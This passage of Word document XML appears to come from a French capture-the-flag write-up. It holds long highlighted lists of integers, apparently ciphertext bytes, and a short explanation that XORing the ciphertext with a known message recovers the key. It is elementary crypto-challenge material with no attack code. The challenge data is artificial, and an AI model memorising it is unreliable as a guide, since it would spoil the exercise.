              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le titre du challenge nous aide beaucoup en nous indiquant que c’est un simple XOR, on procède de la même manière que précédemment en inversant l’ordre du XOR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>MESSAGE ^ CLEF = CHIFFRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>CHIFFRE ^ MESSAGE = CLEF</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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
